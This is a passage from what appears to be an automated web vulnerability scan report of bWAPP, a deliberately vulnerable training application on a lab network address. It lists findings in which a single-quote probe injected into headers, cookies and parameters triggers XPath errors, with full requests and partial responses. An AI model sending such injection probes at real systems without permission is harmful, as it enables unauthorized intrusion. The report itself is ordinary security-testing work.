Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13166

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.85. http://192.168.52.147/bWAPP/bof_1.php [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/bof_1.php

Issue detail

The User-Agent HTTP header appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the User-Agent HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/bof_1.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)'
Connection: close
Referer: http://192.168.52.147/bWAPP/bof_1.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

form_security_level=submit&security_level=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:14:42 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13166

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.86. http://192.168.52.147/bWAPP/bof_1.php [admin cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/bof_1.php

Issue detail

The admin cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the admin cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/bof_1.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/bof_1.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0'; movie_genre=horror

form_security_level=submit&security_level=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:13:45 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13166

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.87. http://192.168.52.147/bWAPP/bof_1.php [bug parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/bof_1.php

Issue detail

The bug parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the bug parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/bof_1.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/bof_1.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

bug=1'&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:12:43 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.88. http://192.168.52.147/bWAPP/bof_1.php [form_bug parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/bof_1.php

Issue detail

The form_bug parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the form_bug parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/bof_1.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/bof_1.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

bug=1&form_bug=submit'

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:12:59 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.89. http://192.168.52.147/bWAPP/bof_1.php [form_security_level parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/bof_1.php

Issue detail

The form_security_level parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the form_security_level parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/bof_1.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/bof_1.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

form_security_level=submit'&security_level=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:12:44 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13166

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.90. http://192.168.52.147/bWAPP/bof_1.php [movie_genre cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/bof_1.php

Issue detail

The movie_genre cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the movie_genre cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/bof_1.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/bof_1.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror'

form_security_level=submit&security_level=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:13:54 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13166

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.91. http://192.168.52.147/bWAPP/bof_1.php [name of an arbitrarily supplied URL parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/bof_1.php

Issue detail

The name of an arbitrarily supplied URL parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the name of an arbitrarily supplied URL parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/bof_1.php?1'=1 HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/bof_1.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:14:26 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.92. http://192.168.52.147/bWAPP/bof_1.php [name of an arbitrarily supplied body parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/bof_1.php

Issue detail

The name of an arbitrarily supplied body parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the name of an arbitrarily supplied body parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/bof_1.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/bof_1.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

form_security_level=submit&security_level=1&1'=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:14:16 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13166

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.93. http://192.168.52.147/bWAPP/bof_1.php [secret cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/bof_1.php

Issue detail

The secret cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the secret cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/bof_1.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/bof_1.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2f'; admin=0; movie_genre=horror

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:13:33 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.94. http://192.168.52.147/bWAPP/bof_1.php [security_level cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/bof_1.php

Issue detail

The security_level cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the security_level cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/bof_1.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/bof_1.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1'; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:13:22 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23369

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.95. http://192.168.52.147/bWAPP/bof_1.php [security_level parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/bof_1.php

Issue detail

The security_level parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the security_level parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/bof_1.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/bof_1.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

form_security_level=submit&security_level=1'

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:13:00 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13163

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.96. http://192.168.52.147/bWAPP/bof_2.php [Base64-decoded value of the secret cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/bof_2.php

Issue detail

The Base64-decoded value of the secret cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the Base64-decoded value of the secret cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/bof_2.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/bof_2.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2fJw%3d%3d; admin=0; movie_genre=horror

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:14:23 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.97. http://192.168.52.147/bWAPP/bof_2.php [Referer HTTP header]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/bof_2.php

Issue detail

The Referer HTTP header appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the Referer HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/bof_2.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:15:14 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.98. http://192.168.52.147/bWAPP/bof_2.php [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/bof_2.php

Issue detail

The User-Agent HTTP header appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the User-Agent HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/bof_2.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)'
Connection: close
Referer: http://192.168.52.147/bWAPP/bof_2.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:15:02 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.99. http://192.168.52.147/bWAPP/bof_2.php [admin cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/bof_2.php

Issue detail

The admin cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the admin cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/bof_2.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/bof_2.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0'; movie_genre=horror

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:14:01 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.100. http://192.168.52.147/bWAPP/bof_2.php [bug parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/bof_2.php

Issue detail

The bug parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the bug parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/bof_2.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/bof_2.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

bug=1'&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:12:59 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.101. http://192.168.52.147/bWAPP/bof_2.php [form_bug parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/bof_2.php

Issue detail

The form_bug parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the form_bug parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/bof_2.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/bof_2.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

bug=1&form_bug=submit'

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:13:16 GMT
